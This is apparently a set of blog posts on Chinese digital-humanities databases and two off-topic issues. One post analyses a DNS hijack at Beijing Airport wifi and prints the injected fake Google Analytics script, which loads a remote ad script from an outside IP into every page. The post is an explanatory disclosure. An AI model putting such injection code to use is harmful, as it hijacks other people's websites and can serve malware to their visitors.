China Biographical Database

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. CBDB is a joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History. Its relatively compact website belies an extraordinary wealth of structured data, which is available for download as an Access database and can also be queried directly through an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.



The underlying tables that store the information can also be accessed directly to construct complex queries or to export subsets of the data.

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.
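As a rough illustration of the kinds of query described above (a name in Chinese or Pinyin, or a record number), here is a minimal sketch that only builds the request URL. The endpoint path and the parameter names `name`, `id` and `o` are assumptions on my part rather than something stated in this post, so check them against the CBDB API documentation before relying on them.

```javascript
// Assumed endpoint; not taken from this post. Verify against the CBDB site.
const CBDB_API_ENDPOINT = "https://cbdb.fas.harvard.edu/cbdbapi/person.php";

// Build a query URL for either a record number (number) or a name (string).
// The parameter names "id", "name" and "o" (output format) are assumptions.
function buildCbdbQueryUrl(query, format = "json") {
  const url = new URL(CBDB_API_ENDPOINT);
  if (typeof query === "number") {
    url.searchParams.set("id", String(query));
  } else {
    url.searchParams.set("name", query);
  }
  url.searchParams.set("o", format);
  return url.toString();
}
```

Calling `buildCbdbQueryUrl("王安石")` or `buildCbdbQueryUrl(1762, "xml")` (1762 is just an example record number) returns a string that can be passed to `fetch` or pasted into a browser. Nothing is sent over the network by the function itself.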

Surprisingly, even though the entire database is made freely available for download, I found no explicit license or statement on acceptable reuse of the data other than the generic copyright notice at the bottom of the website. It is therefore unclear whether it is intended to be open source, though it is clearly open access.

Posted in Digital humanities

Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual JavaScript or iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

location_sign="jc";
var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
if(sign)
{
	var group = sign.match(regx);
	if(group)
	{
		var s = group[1];
	}
}
var url = "http://121.40.180.161/ad.js?" + s;
var jsNode = document.createElement('script');
jsNode.setAttribute('src',url);
if(document.body)
{
	if(document.body.appendChild)
	{
		document.body.appendChild(jsNode);
	}
}
else
{
	var head = document.getElementsByTagName('head').item(0);
	if(head.appendChild)
	{
		head.appendChild(jsNode);
	}
}

In effect, this code says “fetch an advert script from 121.40.180.161 and attach it to this webpage”, apparently passing along the name of the script file it is running from – definitely not what Google Analytics ought to be doing. So why is this happening?
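To see what the first few lines of that script are doing, the sketch below applies the same regular expression to a stack trace string. The sample trace is hypothetical, written in the format Chrome-style engines produce, and the helper name `extractScriptName` is mine. Nothing here contacts the advert server; it only builds the URL string.

```javascript
// The same pattern the injected script uses on new Error('log').stack.
const regx = /.*\/(.*?\.js.*?)/;

// Return the captured script file name, or undefined if nothing matches
// (which is also what the original's variable "s" would be in that case).
function extractScriptName(stack) {
  const group = stack.match(regx);
  return group ? group[1] : undefined;
}

// Hypothetical stack trace, as it might look when the code runs from ga.js.
const sampleStack =
  "Error: log\n    at http://www.google-analytics.com/ga.js:2:12";

const s = extractScriptName(sampleStack);
const url = "http://121.40.180.161/ad.js?" + s;
// s   -> "ga.js"
// url -> "http://121.40.180.161/ad.js?ga.js"
```

The greedy `.*\/` consumes everything up to the last slash on the line, and the lazy group then stops as soon as it has seen `.js`, so the query string ends up carrying just the file name of the script that was replaced. If the engine provides no stack, the original code appends the literal text `undefined` instead.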

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com (203.208.40.133): 56 data bytes
64 bytes from 203.208.40.133: icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from 203.208.40.133: icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to 203.208.40.133… who does that belong to?

home:~ user$ whois 203.208.40.133

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 203.208.40.133"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=203.208.40.133?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       203.0.0.0 - 203.255.255.255
CIDR:           203.0.0.0/8
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
RegDate:
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '203.208.32.0 - 203.208.63.255'

inetnum:        203.208.32.0 - 203.208.63.255
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to '203.208.40.0/23AS24424'

route:          203.208.40.0/23
descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about 203.208.40.0/23 ultimately belonging to “FM SITE5” and perhaps being associated with ganji.com.
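The range checks behind that reading of the whois output can be reproduced with a few lines of code. This is a minimal sketch with helper names of my own choosing. The `/19` prefix is my conversion of the listed range 203.208.32.0 - 203.208.63.255 and does not appear in the whois response itself.

```javascript
// Convert a dotted-quad IPv4 address to an unsigned 32-bit integer.
function ipv4ToInt(address) {
  const octets = address.split(".").map(Number);
  const valid =
    octets.length === 4 &&
    octets.every((o) => Number.isInteger(o) && o >= 0 && o <= 255);
  if (!valid) {
    throw new Error("not a dotted-quad IPv4 address: " + address);
  }
  return (
    ((octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]) >>> 0
  );
}

// Check whether an address falls inside a CIDR block such as "203.208.40.0/23".
function inCidr(address, cidr) {
  const [base, prefixText] = cidr.split("/");
  const prefix = Number(prefixText);
  if (!Number.isInteger(prefix) || prefix < 0 || prefix > 32) {
    throw new Error("invalid prefix length in: " + cidr);
  }
  // Shifting by 32 is a no-op in JavaScript, so handle /0 explicitly.
  const mask = prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
  return ((ipv4ToInt(address) & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}

const inGoogleCnRange = inCidr("203.208.40.133", "203.208.32.0/19"); // true
const inFmSite5Route = inCidr("203.208.40.133", "203.208.40.0/23"); // true
const adServerInRange = inCidr("121.40.180.161", "203.208.32.0/19"); // false
```

So the address returned for www.google-analytics.com sits inside both the GOOGLECN allocation and the “FM SITE5” route, while the server that actually delivers the adverts is in an unrelated range.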

Anyway, it looks like someone is altering the DNS response for www.google-analytics.com so that it points to a server they control, which lets them display adverts on other people’s websites – in fact, on any website that uses Google Analytics.

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere.

The scary thing about this is that the malicious code can easily be set to do all sorts of things. Displaying adverts is relatively benign compared with, for instance, popups that appear to come from legitimate and trusted sites but trick users into downloading malware-ridden software, or direct attacks on known browser weaknesses. By compromising routers that serve large numbers of users – airport wifi being an excellent example – scams that take advantage of Google Analytics code can quickly affect large numbers of people. Since the genuine Analytics code has no visible effect from a user’s perspective, its replacement with malicious code is easily overlooked.

Posted in Off topic

HK Visa Online Application Status Enquiry – Invalid Reference Number

This post is a little off-topic, but perhaps it will help people searching for a solution to the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the front of the middle field until the form would allow no more. With the form now showing “XXXX-000nnnn-nn”, I submitted it, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field.
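For anyone who wants to do the padding without counting zeros by hand, here is a minimal sketch. The three-part format and the width of 7 are inferred only from my own receipt and the behaviour of the form, not from any official specification, and the function name is hypothetical.

```javascript
// Left-pad the middle field of a reference number with zeros.
// Assumes the form "XXXX-nnnn-nn" and a 7-digit middle field (both inferred).
function padReferenceNumber(reference, middleWidth = 7) {
  const parts = reference.trim().split("-");
  if (parts.length !== 3) {
    throw new Error("expected three fields separated by hyphens");
  }
  const [prefix, middle, suffix] = parts;
  if (!/^\d+$/.test(middle) || middle.length > middleWidth) {
    throw new Error("middle field must be 1 to " + middleWidth + " digits");
  }
  return [prefix, middle.padStart(middleWidth, "0"), suffix].join("-");
}

const padded = padReferenceNumber("ABCD-1234-56");
// padded -> "ABCD-0001234-56"
```

A number whose middle field already has 7 digits is returned unchanged, so it is safe to run the function on any reference before submitting it.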

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must be of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).

Posted in Off topic

Ming Qing Women’s Writings

The Ming Qing Women’s Writings (明清婦女著作) site provides a carefully curated database of women’s writing from the Ming, Qing, and Republican periods of Chinese history. The database contains a wealth of information about authors and individual texts (and poems) within individual works. The online version also includes facsimiles of all the corresponding texts that can be navigated using this extensive set of data.

While all of this data can be conveniently searched online in Chinese or Pinyin, it is also possible to download the entire data set in MS Access format.

Encouragingly, the site seems to be actively maintained (“last update: December 2014”), and is currently part of a research project running until at least 2016.

Posted in Digital humanities

CHinese ANcient Texts (CHANT) update

The Chinese University of Hong Kong’s subscription-based CHinese ANcient Texts (CHANT) website has recently undergone some renovation. The new interface appears to largely follow the layout and functionality of the previous version, although there seem to be a few puzzling changes, such as the omission of source text explanations and lists of emendations, both of which were previously available at least for most texts in the Pre-Qin and Han section. A new feature is the option to display a text with or without the corrections applied to it, by clicking the new “校改” and “原文” buttons.

The site now makes extensive use of JavaScript to fetch pages, which can be frustrating as there is no indication that a page is loading. A huge benefit of the new site, however, is that the annotations finally display correctly in browsers other than Internet Explorer.

Coinciding with the change, it has become possible (at least at my institution) to access more areas of the database, though it’s unclear whether this is due to an accidental change, a policy decision, or the library paying a higher subscription rate.

Posted in Digital humanities